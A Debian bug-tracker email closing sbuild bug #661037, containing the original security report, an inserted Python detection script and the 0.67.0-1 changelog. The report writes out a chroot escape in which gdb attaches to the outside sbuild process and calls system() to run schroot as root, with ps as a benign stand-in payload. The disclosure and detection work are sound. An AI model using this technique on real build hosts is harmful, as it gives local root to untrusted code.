Your message dated Sat, 26 Dec 2015 15:51:44 +0000
with message-id <[email protected]>
and subject line Bug#661037: fixed in sbuild 0.67.0-1
has caused the Debian Bug report #661037,
regarding process building package can escape from chroot and gain local root
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
661037: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=661037
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: sbuild
Version: 0.62.6-1
Severity: important
Tags: security

When building a package with sbuild, the processes running in the chroot
can escape from there and gain local root. This is possible as the
processes in- and outside of the chroot environment run under the same
user id and the outside process can run commands as root in the chroot
environment.

To be precise, a malicious package could for example use gdb to attach
to the outside process and then execute something along the lines of
system("schroot -u root -c [known-chroot-name] [some-command]").  An
example package doing so is attached (it needs procps installed in the
chroot):

=====================================================================
[...]
1001     12772   \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A 
sbuild-to-root_1.dsc
1001     12779       \_ package log for sbuild-to-root_1_amd64
root     13988       \_ schroot -d /«PKGBUILDDIR» -c 
unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u 
sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001     13989           \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b 
-rfakeroot -j12
1001     14041               \_ /usr/bin/make -f debian/rules build
1001     14042                   \_ /usr/bin/perl -w /usr/bin/dh build
1001     14051                       \_ /usr/bin/make -f debian/rules 
override_dh_auto_build
1001     14052                           \_ /bin/sh ./sbuild-to-root
1001     14053                               \_ ps axfu
[...]
Will try using 12772...
Guessed chroot name: unstable-amd64-sbuild
--- gdb-script -----------------------
p system("cd /; schroot -u root -c unstable-amd64-sbuild ps axfu")
detach
--------------------------------------
[...]
1001     12772   \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A 
sbuild-to-root_1.dsc
1001     12779       \_ package log for sbuild-to-root_1_amd64
root     13988       \_ schroot -d /«PKGBUILDDIR» -c 
unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u 
sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001     13989       |   \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b 
-rfakeroot -j12
1001     14041       |       \_ /usr/bin/make -f debian/rules build
1001     14042       |           \_ /usr/bin/perl -w /usr/bin/dh build
1001     14051       |               \_ /usr/bin/make -f debian/rules 
override_dh_auto_build
1001     14052       |                   \_ /bin/sh ./sbuild-to-root
1001     14068       |                       \_ gdb -batch -x gdb-script 
/usr/bin/perl 12772
1001     14072       \_ sh -c cd /; schroot -u root -c unstable-amd64-sbuild ps 
axfu
root     14073           \_ schroot -u root -c unstable-amd64-sbuild ps axfu
root     14169               \_ /bin/ps axfu
[...]
=====================================================================

As building untrusted packages is not a good idea anyway, I don't think
this issue is grave; however, it would still be nice if there was an
option to run the processes inside the chroot under a different userid.

Regards,
Ansgar

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing'), (100, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-1-amd64 (SMP w/12 CPU cores)
Locale: LANG=C, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages sbuild depends on:
ii  adduser         3.113+nmu1
ii  apt-utils       0.8.15.9
ii  libsbuild-perl  0.62.6-1
ii  perl            5.14.2-7
ii  perl-modules    5.14.2-7

Versions of packages sbuild recommends:
ii  debootstrap  1.0.38
ii  fakeroot     1.18.2-1

Versions of packages sbuild suggests:
ii  deborphan  <none>
ii  wget       1.13.4-2

-- no debconf information

Attachment: sbuild-to-root_1.tar.gz
Description: GNU Zip compressed data


--- End Message ---
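The condition the report rests on is observable from a process listing: every process underneath the `schroot ... --run-session` launcher (that is, inside the chroot) runs under the same uid as the sbuild process outside it. The script below is an added example, not code from the report or from sbuild itself. It parses a `ps axf`-style tree listing of the simplified form quoted above and flags each in-chroot process whose user matches the outside sbuild process, which lets a build host be checked for the pre-0.67.0 behaviour. Both listings are constructed for the example and modelled on the report's output; the second one, in which the in-chroot processes run as a separate user `builder` (a made-up name), stands for the configuration the fix makes possible. The function and variable names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Iterator, List, Tuple


@dataclass
class Proc:
    """One row of the process tree."""
    user: str
    pid: int
    cmd: str
    depth: int
    children: List["Proc"] = field(default_factory=list)


# USER, PID, then the tree-drawn command column; rows such as "[...]" do not match.
LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s(.*)$")


def parse_ps_tree(text: str) -> List[Proc]:
    """Parse a simplified `ps axf`-style listing (USER PID tree-command) into a
    forest. Depth is the width of the tree drawing before the '\\_' marker,
    which is how ps -f indents children under their parent."""
    roots: List[Proc] = []
    stack: List[Proc] = []              # ancestry of the row currently being read
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        user, pid, rest = m.group(1), int(m.group(2)), m.group(3)
        body = rest.lstrip(" |")        # drop indentation and vertical tree bars
        depth = len(rest) - len(body)
        cmd = body[3:] if body.startswith("\\_ ") else body
        node = Proc(user, pid, cmd, depth)
        while stack and stack[-1].depth >= depth:
            stack.pop()
        (stack[-1].children if stack else roots).append(node)
        stack.append(node)
    return roots


def walk(node: Proc) -> Iterator[Proc]:
    """Yield node and all of its descendants, depth first."""
    yield node
    for child in node.children:
        yield from walk(child)


def find_same_uid_processes(roots: List[Proc],
                            sbuild_cmd: str = "/usr/bin/sbuild") -> List[Tuple[int, str, str]]:
    """Return (pid, user, cmd) for each process inside a schroot session (below a
    'schroot ... --run-session' launcher) that runs under the same user as the
    sbuild process outside the chroot. A non-empty result is the condition the
    bug report describes; a separate in-chroot build user yields []."""
    findings, seen = [], set()
    for root in roots:
        for node in walk(root):
            if sbuild_cmd not in node.cmd:
                continue
            outside_user = node.user
            for launcher in walk(node):
                if launcher is node or "--run-session" not in launcher.cmd:
                    continue
                for inside in walk(launcher):
                    if inside is launcher or inside.pid in seen:
                        continue
                    if inside.user == outside_user:
                        seen.add(inside.pid)
                        findings.append((inside.pid, inside.user, inside.cmd))
    return findings


# Constructed listing modelled on the bug report: outside and inside share uid 1001.
SAME_UID_LISTING = r"""
1001     12772   \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc
1001     12779       \_ package log for sbuild-to-root_1_amd64
root     13988       \_ schroot -d /«PKGBUILDDIR» -c unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001     13989           \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001     14041               \_ /usr/bin/make -f debian/rules build
1001     14042                   \_ /usr/bin/perl -w /usr/bin/dh build
"""

# Constructed listing for a separate in-chroot build user ("builder" is a made-up name).
SEPARATE_UID_LISTING = r"""
1001     12772   \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc
1001     12779       \_ package log for sbuild-to-root_1_amd64
root     13988       \_ schroot -d /«PKGBUILDDIR» -c unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u builder -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
builder  13989           \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12
builder  14041               \_ /usr/bin/make -f debian/rules build
builder  14042                   \_ /usr/bin/perl -w /usr/bin/dh build
"""

if __name__ == "__main__":
    for label, listing in (("same uid", SAME_UID_LISTING), ("separate uid", SEPARATE_UID_LISTING)):
        hits = find_same_uid_processes(parse_ps_tree(listing))
        print(f"{label}: {len(hits)} in-chroot process(es) share the outside user")
        for pid, user, cmd in hits:
            print(f"  pid {pid} user {user}: {cmd}")
```

On the first listing the check reports the three in-chroot processes (dpkg-buildpackage, make, dh) as sharing uid 1001 with the outside sbuild; on the second it reports nothing, which is the state the changelog entry "allow changing the user running dpkg-buildpackage inside the chroot" aims for. To run it against a live host, feed the script the USER, PID and command columns of `ps axf -o user,pid,cmd`; the parser ignores rows without a numeric PID.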
--- Begin Message ---
Source: sbuild
Source-Version: 0.67.0-1

We believe that the bug you reported is fixed in the latest version of
sbuild, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Johannes Schauer <[email protected]> (supplier of updated sbuild package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 26 Dec 2015 15:19:29 +0100
Source: sbuild
Binary: libsbuild-perl sbuild buildd
Architecture: source
Version: 0.67.0-1
Distribution: unstable
Urgency: medium
Maintainer: Debian buildd-tools Developers 
<[email protected]>
Changed-By: Johannes Schauer <[email protected]>
Description:
 buildd     - Daemon for automatically building Debian binary packages from Deb
 libsbuild-perl - Tool for building Debian binary packages from Debian sources
 sbuild     - Tool for building Debian binary packages from Debian sources
Closes: 655215 661037 691539 703814 709270 709864 713033 726866 751732 760832 
774351 782534 786456 799056 800317 801436 801798 802678 805063 806931 807488 
808290 808560
Changes:
 sbuild (0.67.0-1) unstable; urgency=medium
 .
   * fix Vcs-Browser and Vcs-Git fields to point at the debian/unstable branch
     (closes: #805063)
   * add Suggests: libwww-perl to libsbuild-perl because it can optionally make
     use of LWP::UserAgent (closes: #703814)
   * new upstream version
     - ./man/sbuild.1.in: improve documentation of external commands
       (closes: #802678)
     - bin/sbuild: add --clean-source and --no-clean-source to allow building a
       package from an unpacked directory without calling debian/rules clean
       (closes: #655215)
     - allow changing the user running dpkg-buildpackage inside the chroot
       (closes: #661037)
     - Check architecture wildcard matching with dpkg inside the chroot to avoid
       situations in which dpkg outside the chroot doesn't know about a new
       architecture yet (closes: #691539)
     - lib/Sbuild/Build.pm: say --build instead of incorrect --build-arch
       (closes: #709270)
     - bin/sbuild-createchroot: honor --foreign (closes: #709864)
     - man/sbuild-setup.7.in: correct section 8 for sbuild-createchroot and
       sbuild-adduser (closes: #713033)
     - Fix permission of public key (closes: #726866)
     - sbuild-createchroot: use union-type=overlay for directory chroot and
       promote tarball chroot in the manpage (closes: #751732)
     - sbuild-createchroot: run debootstrap with --no-check-gpg if --keyring=""
       is passed (closes: #760832)
     - Quit processing when external commands fail (closes: #774351)
     - bin/sbuild-createchroot: check if chroot already exists before creating a
       new one (closes: #782534)
     - Print better message when no chroot is specified (closes: #786456)
     - Add the --no-arch-any and --arch-any options
     - Successfully handle a source only build. (Closes: #799056)
     - lib/Sbuild.pm: improve error message about sbuild group membership
       (closes: #800317)
     - bin/sbuild: turn path to input dsc or source directory into an absolute
       path (closes: #801436)
     - Set [trusted=yes] for internal dummy repository to make key generation
       optional (closes: #801798)
     - have a default for CROSSBUILD_CORE_DEPENDS (closes: #806931)
     - lib/Sbuild/Chroot.pm: apply environment filter *before* setting
       environment variables set by sbuild itself (closes: #807488)
     - lib/Sbuild/ChrootInfo.pm: fix error handling (closes: #808290)
     - lib/Sbuild/Build.pm: make sure regex only matches lines in the Files
       field (closes: #808560)
   * drop all patches which have now been applied upstream
Checksums-Sha1:
 be587e85714ff8782d1cec4755c2f8db20a7c3b4 2236 sbuild_0.67.0-1.dsc
 23e53260ad3b714539430738ab93616e27713280 596164 sbuild_0.67.0.orig.tar.gz
 af9f8f02b0891ef5b1dba57e1eed81b5020b5edc 52212 sbuild_0.67.0-1.debian.tar.xz
Checksums-Sha256:
 588fa85e62125b0c0c87e6bec63fad1843e7e45d6ec3e0b3143537a25fdcf00a 2236 
sbuild_0.67.0-1.dsc
 e1649b7f2b7faf210ec9b70aa191a9bd5ae5608c671db7a088724734289977c0 596164 
sbuild_0.67.0.orig.tar.gz
 1d4c446d3df9f198514d201607041a9b05331a25d3e3b11d03c089129e2efbf9 52212 
sbuild_0.67.0-1.debian.tar.xz
Files:
 138b1d6e59a826d6217597fd6aa527e8 2236 devel extra sbuild_0.67.0-1.dsc
 36a58b81f0f713f72158c364778fb1ed 596164 devel extra sbuild_0.67.0.orig.tar.gz
 d077c00fb68ca7d655c98b26719649a3 52212 devel extra 
sbuild_0.67.0-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
-----END PGP SIGNATURE-----

--- End Message ---
